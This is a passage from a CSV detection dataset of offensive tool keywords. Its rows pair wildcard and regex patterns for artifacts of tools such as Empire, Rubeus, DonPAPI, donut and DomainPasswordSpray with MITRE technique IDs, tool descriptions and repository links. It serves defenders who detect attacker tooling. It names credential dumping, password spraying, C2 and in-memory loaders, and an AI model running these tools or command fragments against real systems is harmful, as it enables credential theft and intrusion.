This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHChannel.cs*",".{0,1000}DoHChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*-Domain * -AllowDelegation *",".{0,1000}\-Domain\s.{0,1000}\s\-AllowDelegation\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-Domain * -SPN *",".{0,1000}\-Domain\s.{0,1000}\s\-SPN\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Domain controller is missing* use --dc.*",".{0,1000}Domain\scontroller\sis\smissing.{0,1000}\suse\s\-\-dc\..{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Domain/CommandCollection*",".{0,1000}Domain\/CommandCollection.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*-domain_admins.txt*",".{0,1000}\-domain_admins\.txt.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*domain_analyzer.py*",".{0,1000}domain_analyzer\.py.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_analyzer-master*",".{0,1000}domain_analyzer\-master.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_hunter-v*.jar",".{0,1000}domain_hunter\-v.{0,1000}\.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*domainDumpConfig*",".{0,1000}domainDumpConfig.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*DomainEnumerator*",".{0,1000}DomainEnumerator.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*domainhunter*",".{0,1000}domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. 
The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*domainhunter.py*",".{0,1000}domainhunter\.py.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*Domaininfo/Domaininfo.py*",".{0,1000}Domaininfo\/Domaininfo\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Domainpassspray*",".{0,1000}Domainpassspray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainPasswordSpray*",".{0,1000}DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. 
BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*DomainRecon*ridbrute*",".{0,1000}DomainRecon.{0,1000}ridbrute.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/ADCS*",".{0,1000}DomainRecon\/ADCS.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/BloodHound*",".{0,1000}DomainRecon\/BloodHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/SilentHound*",".{0,1000}DomainRecon\/SilentHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon\ADCSServer.txt*",".{0,1000}DomainRecon\\ADCSServer\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\DC-IPs.txt*",".{0,1000}DomainRecon\\DC\-IPs\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*DomainRecon\ExploitableSystems.txt*",".{0,1000}DomainRecon\\ExploitableSystems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\OxidBindings.txt*",".{0,1000}DomainRecon\\OxidBindings\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\Windows_Servers.txt*",".{0,1000}DomainRecon\\Windows_Servers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainTrustDiscovery_PowerView.py*",".{0,1000}DomainTrustDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*domcachedump.py*",".{0,1000}domcachedump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dome.py *",".{0,1000}dome\.py\s.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*DominicBreuker*",".{0,1000}DominicBreuker.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*donapapi -pvk *",".{0,1000}donapapi\s\-pvk\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*Done dumping SAM hashes for host: 
*",".{0,1000}Done\sdumping\sSAM\shashes\sfor\shost\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Done! Check for existing lsass.dmp file into current folder*",".{0,1000}Done!\sCheck\sfor\sexisting\slsass\.dmp\sfile\sinto\scurrent\sfolder.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*DoNotUseThisPassword123!*",".{0,1000}DoNotUseThisPassword123!.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*DonPAPI ""$DOMAIN""/*",".{0,1000}DonPAPI\s\""\$DOMAIN\""\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*donpapi -credz *",".{0,1000}donpapi\s\-credz\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*DonPAPI.py *",".{0,1000}DonPAPI\.py\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*donpapi_dump*",".{0,1000}donpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*donpapi-master.zip*",".{0,1000}donpapi\-master\.zip.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*Don't be evil with this. 
I created this tool to learn*",".{0,1000}Don\'t\sbe\sevil\swith\sthis\.\sI\screated\sthis\stool\sto\slearn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*DON'T RUN THIS IN YOUR WEB ROOT AS IT WILL OUTPUT ACCESS TOKENS*",".{0,1000}DON\'T\sRUN\sTHIS\sIN\sYOUR\sWEB\sROOT\sAS\sIT\sWILL\sOUTPUT\sACCESS\sTOKENS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Don't_blindly_trust_obfuscated_code_it_might_do_something_bad*",".{0,1000}Don\'t_blindly_trust_obfuscated_code_it_might_do_something_bad.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*donut -f *.dll -c * -m RunProcess*",".{0,1000}donut\s\-f\s.{0,1000}\.dll\s\-c\s.{0,1000}\s\-m\sRunProcess.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut -f c2.dll*",".{0,1000}donut\s\-f\sc2\.dll.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut* \DemoCreateProcess.dll *",".{0,1000}donut.{0,1000}\s\\DemoCreateProcess\.dll\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut.exe *.exe*",".{0,1000}donut\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DONUT_BYPASS_CONTINUE*",".{0,1000}DONUT_BYPASS_CONTINUE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-loader -*",".{0,1000}donut\-loader\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Donut-Loader -process_id*",".{0,1000}Donut\-Loader\s\-process_id.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). 
of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*DonutLoader(*",".{0,1000}DonutLoader\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DonutLoader.cs*",".{0,1000}DonutLoader\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut-maker.py -*",".{0,1000}donut\-maker\.py\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*donut-maker.py -i *.exe*",".{0,1000}donut\-maker\.py\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*donut-payload.*",".{0,1000}donut\-payload\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
